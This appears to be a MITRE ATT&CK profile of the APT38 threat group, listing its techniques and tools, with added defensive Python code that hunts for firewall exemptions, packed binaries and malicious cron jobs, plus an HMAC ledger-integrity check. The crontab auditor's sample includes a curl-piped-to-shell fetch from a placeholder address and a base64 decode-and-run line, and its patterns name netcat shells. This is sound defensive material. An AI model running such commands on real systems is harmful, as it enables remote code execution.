APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.[1] Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext [2] and Banco de Chile [2]; some of their attacks have been destructive.[1][2][3][4]

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

ID: G0082
Associated Groups: NICKEL GLADSTONE, BeagleBoyz, Bluenoroff, Stardust Chollima, Sapphire Sleet, COPERNICIUM
Contributors: Hiroki Nagahama, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India
Version: 3.1
Created: 29 January 2019
Last Modified: 22 January 2025

Associated Group Descriptions

Name Description
NICKEL GLADSTONE [5]
BeagleBoyz [1]
Bluenoroff [4]
Stardust Chollima [6][7]
Sapphire Sleet [8]
COPERNICIUM [8]

Techniques Used

Domain ID Name Use
Enterprise T1005 Data from Local System

APT38 has collected data from a compromised host.[1]

Enterprise T1112 Modify Registry

APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys.[2]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT38 has installed a new Windows service to establish persistence.[1]

Enterprise T1115 Clipboard Data

APT38 used a Trojan called KEYLIME to collect data from the clipboard.[2]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT38 has used PowerShell to execute commands and other operational tasks.[1]

.003 Command and Scripting Interpreter: Windows Command Shell

APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.[2]

.005 Command and Scripting Interpreter: Visual Basic

APT38 has used VBScript to execute commands and other operational tasks.[1]

Enterprise T1562 .003 Impair Defenses: Impair Command History Logging

APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the shell history. This only works when HISTCONTROL contains ignorespace or ignoreboth, a common default in interactive bash profiles; defenders should not rely on shell history as an execution record and should log execve events (for example with auditd) instead.[1]

.004 Impair Defenses: Disable or Modify System Firewall

APT38 has created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.[1]
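Firewall exemptions of this kind are straightforward to hunt for in process-creation telemetry. The following is an added example, not code from MITRE ATT&CK or from any APT38 sample: it parses constructed `netsh advfirewall firewall add rule` command lines (the shape carried in Sysmon EventID 1 or Security 4688 records) and flags inbound allow rules that open any of the ports named on this page. The port list, the rule names and the sample command lines are assumptions made for the example.

```python
# Added example (not MITRE's or APT38's code): audit process-creation telemetry
# for netsh commands that open inbound firewall exceptions on the ports cited
# on this page. Sample command lines are constructed, not real telemetry.
import re

# Ports the page reports APT38 exempting; adjust to the environment.
WATCHED_PORTS = {443, 6443, 8443, 9443}

_ADD_RULE = re.compile(r"netsh(?:\.exe)?\s+advfirewall\s+firewall\s+add\s+rule", re.I)
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_netsh_add_rule(cmdline):
    """Return the key=value options of a 'netsh advfirewall firewall add rule'
    command line as a dict (keys lower-cased, quotes stripped), or None when
    the line is some other command."""
    if not _ADD_RULE.search(cmdline):
        return None
    return {k.lower(): v.strip('"') for k, v in _KV.findall(cmdline)}


def rule_ports(opts):
    """Expand localport= ('443', '6443,8443-9443', 'any') into a set of ints.
    None means every port (explicit 'any' or the option absent)."""
    raw = opts.get("localport", "any").lower()
    if raw == "any":
        return None
    ports = set()
    for part in raw.split(","):
        lo, _, hi = part.partition("-")
        ports.update(range(int(lo), int(hi or lo) + 1))
    return ports


def suspicious_firewall_rules(cmdlines, watched=WATCHED_PORTS):
    """Flag rules that allow inbound traffic on a watched port or on all ports.
    Returns (cmdline, reason) pairs. A missing dir= is treated as inbound,
    the conservative choice when hunting."""
    hits = []
    for line in cmdlines:
        opts = parse_netsh_add_rule(line)
        if opts is None or opts.get("action", "").lower() != "allow":
            continue
        if opts.get("dir", "in").lower() != "in":
            continue
        ports = rule_ports(opts)
        if ports is None:
            hits.append((line, "inbound allow on any port"))
        elif ports & watched:
            hits.append((line, "inbound allow on %s" % sorted(ports & watched)))
    return hits


SAMPLE_CMDLINES = [  # constructed examples of Sysmon EventID 1 / 4688 command lines
    'netsh advfirewall firewall add rule name="Windows Update Helper" dir=in action=allow protocol=TCP localport=443',
    'netsh.exe advfirewall firewall add rule name="svc" dir=in action=allow protocol=TCP localport=6443,8443-9443',
    'netsh advfirewall firewall add rule name="Block Telnet" dir=in action=block protocol=TCP localport=23',
    'netsh advfirewall firewall add rule name="Printer" dir=out action=allow protocol=TCP localport=9100',
    'netsh advfirewall firewall add rule name="Remote Admin" dir=in action=allow program="C:\\Users\\Public\\x.exe" localport=any',
    "ping -n 1 10.0.0.1",
]

if __name__ == "__main__":
    for cmd, why in suspicious_firewall_rules(SAMPLE_CMDLINES):
        print(why, "<-", cmd)
```

Command-line parsing catches rules added through netsh; rules added through PowerShell (New-NetFirewallRule) or the COM API need a second pattern, and Windows itself records every rule addition as Security event 4946 once the firewall rule-level policy change audit subcategory is enabled, which is the more complete source to reconcile against.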

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.[2]

Enterprise T1486 Data Encrypted for Impact

APT38 has used Hermes ransomware to encrypt files with AES256.[2]

Enterprise T1565 .001 Data Manipulation: Stored Data Manipulation

APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.[2]

.002 Data Manipulation: Transmitted Data Manipulation

APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.[2]

.003 Data Manipulation: Runtime Data Manipulation

APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.[2]
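The three DYEPACK behaviours above share one lesson: once the attacker controls the host that stores, prints and displays transaction records, nothing on that host can be trusted to reveal the tampering. The following is an added example, not code from MITRE ATT&CK, SWIFT or any APT38 tool: a keyed record chain in which each stored transaction record gets an HMAC tag that also covers the previous record's tag, so that an altered record breaks its own tag and a deleted, inserted or reordered record breaks every tag after it. The record layout, the key and the sample payments are constructed for the example; in practice the key and the tags must be kept on a host the attacker cannot reach, and reconciliation should also use the counterparty's confirmations rather than locally rendered PDFs.

```python
# Added example (not MITRE's, SWIFT's or APT38's code): a keyed record chain
# that makes alteration, deletion or insertion of stored transaction records
# detectable at reconciliation time. Record layout, key and sample payments
# are constructed for the example.
import hashlib
import hmac
import json


def canonical(record):
    """Serialize a record so that field order cannot change its tag."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def chain_tags(records, key):
    """tag[i] = HMAC(key, tag[i-1] || canonical(record[i])). Altering a record
    breaks its own tag; deleting, inserting or reordering one breaks every
    tag from that point on."""
    prev = b"\x00" * 32
    tags = []
    for rec in records:
        prev = hmac.new(key, prev + canonical(rec), hashlib.sha256).digest()
        tags.append(prev)
    return tags


def verify_chain(records, tags, key):
    """Recompute the chain over the records read back from the transaction
    store and compare with 'tags' kept on an independent host. Returns
    (ok, index of the first record whose tag does not match)."""
    recomputed = chain_tags(records, key)
    for i, (a, b) in enumerate(zip(recomputed, tags)):
        if not hmac.compare_digest(a, b):
            return False, i
    if len(recomputed) != len(tags):
        return False, min(len(recomputed), len(tags))
    return True, None


KEY = b"reconciliation-key-held-off-the-transaction-host"  # constructed
LEDGER = [  # constructed sample payment records, not real SWIFT messages
    {"ref": "TRN0001", "debtor": "ACME BANK", "creditor": "GLOBEX", "amount": "125000.00", "ccy": "USD"},
    {"ref": "TRN0002", "debtor": "ACME BANK", "creditor": "INITECH", "amount": "3500000.00", "ccy": "USD"},
    {"ref": "TRN0003", "debtor": "ACME BANK", "creditor": "HOOLI", "amount": "4200.00", "ccy": "EUR"},
]


def demo():
    """Tag the ledger, then check an intact copy, a copy with a redirected
    beneficiary, and a copy with one record deleted."""
    tags = chain_tags(LEDGER, KEY)
    altered = [dict(r) for r in LEDGER]
    altered[1]["creditor"] = "MULE ACCOUNT"
    deleted = LEDGER[:1] + LEDGER[2:]
    return (
        verify_chain(LEDGER, tags, KEY),
        verify_chain(altered, tags, KEY),
        verify_chain(deleted, tags, KEY),
    )


if __name__ == "__main__":
    print(demo())
```

The chain pinpoints the first divergent record, which is what an investigator needs to scope the fraud; it does not prevent the tampering, so it belongs in an out-of-band reconciliation job, not in the transaction host's own code path.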

Enterprise T1485 Data Destruction

APT38 has used a custom secure delete function to make deleted files unrecoverable.[2]

Enterprise T1083 File and Directory Discovery

APT38 has enumerated files and directories, or searched in specific locations within a compromised host.[1]

Enterprise T1110 Brute Force

APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.[1]

Enterprise T1505 .003 Server Software Component: Web Shell

APT38 has used web shells for persistence or to ensure redundant access.[1]

Enterprise T1106 Native API

APT38 has used the Windows API to execute code within a victim's system.[1]

Enterprise T1217 Browser Information Discovery

APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.[1]

Enterprise T1189 Drive-by Compromise

APT38 has conducted watering hole schemes to gain initial access to victims.[2][1]

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.[2]
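Commercial packers leave two cheap triage signals in a PE file: section names the packer writes and sections whose byte entropy is close to 8 bits per byte because the original code is stored compressed or encrypted. The following is an added example, not code from MITRE ATT&CK or from any APT38 sample; the section-name table is compiled from common practice (an assumption, not derived from APT38 implants) and the sample sections are constructed byte strings shaped like the (Name, data) pairs pefile returns.

```python
# Added example (not MITRE's or APT38's code): two cheap triage indicators for
# packed PE files, a list of section names that the packers named on this page
# are known to create and a per-section entropy check. The section-name list is
# compiled from common practice (an assumption, not taken from any APT38
# sample) and the sample sections are constructed.
import hashlib
import math
from collections import Counter

PACKER_SECTIONS = {
    ".themida": "Themida",
    ".vmp0": "VMProtect", ".vmp1": "VMProtect", ".vmp2": "VMProtect",
    ".enigma1": "Enigma", ".enigma2": "Enigma",
}
HIGH_ENTROPY = 7.0   # bits per byte; compressed or encrypted data approaches 8.0
MIN_SIZE = 1024      # tiny sections give unreliable entropy estimates


def shannon_entropy(data):
    """Bits of entropy per byte of 'data' (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def packer_indicators(sections):
    """sections: iterable of (name, raw_bytes), e.g. built from pefile's
    pe.sections. Returns (section, reason) findings."""
    findings = []
    for name, raw in sections:
        key = name.rstrip("\x00").lower()
        if key in PACKER_SECTIONS:
            findings.append((name, "section name used by " + PACKER_SECTIONS[key]))
        ent = shannon_entropy(raw)
        if len(raw) >= MIN_SIZE and ent >= HIGH_ENTROPY:
            findings.append((name, "high entropy (%.2f bits/byte)" % ent))
    return findings


def pseudo_random(n, seed=b"constructed"):
    """Deterministic high-entropy filler standing in for packed code."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


SAMPLE_SECTIONS = [  # constructed, shaped like (Name, get_data()) from pefile
    (".text\x00\x00\x00", b"\x55\x8b\xec\x83\xec\x10" * 600 + b"\xc3" * 100),
    (".themida", pseudo_random(4096)),
    (".rsrc\x00\x00\x00", b"\x00" * 2048),
]

if __name__ == "__main__":
    for sec, why in packer_indicators(SAMPLE_SECTIONS):
        print(sec.rstrip("\x00"), why)
```

Against a real file, feed it `((s.Name.decode("latin-1"), s.get_data()) for s in pefile.PE(path).sections)`. Treat hits as a reason to unpack and look closer, not as a verdict: the same packers protect plenty of legitimate commercial software, and a packer that leaves section names alone still shows up on the entropy check.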

Enterprise T1204 .002 User Execution: Malicious File

APT38 has attempted to lure victims into enabling malicious macros within email attachments.[1]

Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.[2]

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT38 clears Windows Event Logs and Sysmon logs from the system.[2]

.004 Indicator Removal: File Deletion

APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.[2][1]

.006 Indicator Removal: Timestomp

APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.[1]

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT38 has used CHM files to move concealed payloads.[9]

.011 System Binary Proxy Execution: Rundll32

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.[1]

Enterprise T1082 System Information Discovery

APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.[1]

Enterprise T1529 System Shutdown/Reboot

APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.[2]

Enterprise T1033 System Owner/User Discovery

APT38 has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.[1]

Enterprise T1569 .002 System Services: Service Execution

APT38 has created new services or modified existing ones to run executables, commands, or scripts.[1]

Enterprise T1049 System Network Connections Discovery

APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.[2]

Enterprise T1135 Network Share Discovery

APT38 has enumerated network shares on a compromised host.[1]

Enterprise T1588 .002 Obtain Capabilities: Tool

APT38 has obtained and used open-source tools such as Mimikatz.[10]

Enterprise T1518 .001 Software Discovery: Security Software Discovery

APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.[1]

Enterprise T1105 Ingress Tool Transfer

APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.[2]

Enterprise T1056 .001 Input Capture: Keylogging

APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.[2]

Enterprise T1057 Process Discovery

APT38 leveraged Sysmon to understand the processes and services running in the organization.[2]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT38 has conducted spearphishing campaigns using malicious email attachments.[1]

Enterprise T1053 .003 Scheduled Task/Job: Cron

APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.[1]

.005 Scheduled Task/Job: Scheduled Task

APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.[1]
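Cron persistence of the kind described for Linux hosts above is easy to audit once crontab contents are collected. The following is an added example, not code from MITRE ATT&CK or from any APT38 tool: it parses a user crontab (five-field entries and @reboot-style shortcuts) and flags commands that run from world-writable directories, pipe a download into a shell, decode base64 at run time, or bind netcat to a shell, adding the schedule as context. The patterns are a starting point chosen for this example and the sample crontab is constructed (198.51.100.7 is a documentation address).

```python
# Added example (not MITRE's or APT38's code): audit crontab contents for the
# kind of entries an intruder uses for scheduled persistence on Linux. The
# patterns are a starting point chosen for this example, and the sample
# crontab is constructed (198.51.100.7 is a documentation address).
import re

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes base64 at run time"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e (shell bound to a socket)"),
]
_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text):
    """Yield (schedule, command) for each active entry of a user crontab:
    the five-field form and @reboot/@hourly style shortcuts. Comments, blank
    lines and VAR=value assignments are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or _ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd.strip()


def audit_crontab(text):
    """Return (schedule, command, reasons) for entries worth a closer look."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = [why for rx, why in PATTERNS if rx.search(cmd)]
        if any(d in cmd for d in WRITABLE_DIRS):
            reasons.append("references a world-writable directory")
        if reasons and sched == "* * * * *":
            reasons.append("runs every minute (beaconing cadence)")
        if reasons and sched == "@reboot":
            reasons.append("re-established at every boot")
        if reasons:
            findings.append((sched, cmd, reasons))
    return findings


SAMPLE_CRONTAB = """\
# m h dom mon dow command      (constructed sample)
SHELL=/bin/sh
MAILTO=root
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
* * * * * /dev/shm/.x/update >/dev/null 2>&1
@reboot curl -s http://198.51.100.7/i.sh | sh
30 4 * * 1 echo aGVsbG8= | base64 -d > /tmp/.o && sh /tmp/.o
"""

if __name__ == "__main__":
    for sched, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(sched, cmd, "->", "; ".join(reasons))
```

System crontabs (/etc/crontab and /etc/cron.d/*) carry a user field between the schedule and the command, so split into seven parts there; the same audit should also cover /etc/cron.{hourly,daily,weekly,monthly} scripts and systemd timers, which an intruder can use for the same purpose.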

Software

ID Name References Techniques
S0334 DarkComet [2] Masquerading: Match Legitimate Name or Location, Modify Registry, Clipboard Data, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify System Firewall, Impair Defenses: Disable or Modify Tools, Application Layer Protocol: Web Protocols, Obfuscated Files or Information: Software Packing, System Information Discovery, System Owner/User Discovery, Video Capture, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Remote Services: Remote Desktop Protocol, Audio Capture
S0593 ECCENTRICBANDWAGON [1] Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Data Staged: Local Data Staging, Obfuscated Files or Information, Indicator Removal: File Deletion, Input Capture: Keylogging
S0376 HOPLIGHT [1] Windows Management Instrumentation, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Proxy, Use Alternate Authentication Material: Pass the Hash, Modify Registry, Command and Scripting Interpreter: Windows Command Shell, Fallback Channels, Impair Defenses: Disable or Modify System Firewall, OS Credential Dumping: Security Account Manager, Data Encoding: Standard Encoding, File and Directory Discovery, Query Registry, System Information Discovery, System Time Discovery, System Services: Service Execution, Device Driver Discovery, Ingress Tool Transfer, Process Injection, Exfiltration Over C2 Channel, Non-Standard Port
S0607 KillDisk [10] Data Destruction, Indicator Removal on Host, Loss of View, Service Stop, Masquerading: Masquerade Task or Service, Shared Modules, Data Encrypted for Impact, Data Destruction, File and Directory Discovery, Service Stop, Native API, Obfuscated Files or Information, Disk Wipe: Disk Structure Wipe, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, System Information Discovery, System Shutdown/Reboot, Access Token Manipulation, Process Discovery
S0002 Mimikatz [2] Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, Rogue Domain Controller, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket, Boot or Logon Autostart Execution: Security Support Provider, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Unsecured Credentials: Private Keys, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Authentication Certificates, Access Token Manipulation: SID-History Injection, Account Manipulation
S0039 Net [2] Create Account: Local Account, Create Account: Domain Account, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Indicator Removal: Network Share Connection Removal, System Time Discovery, System Services: Service Execution, System Service Discovery, System Network Connections Discovery, Network Share Discovery, Account Discovery: Domain Account, Account Discovery: Local Account, Account Manipulation: Additional Local or Domain Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery

References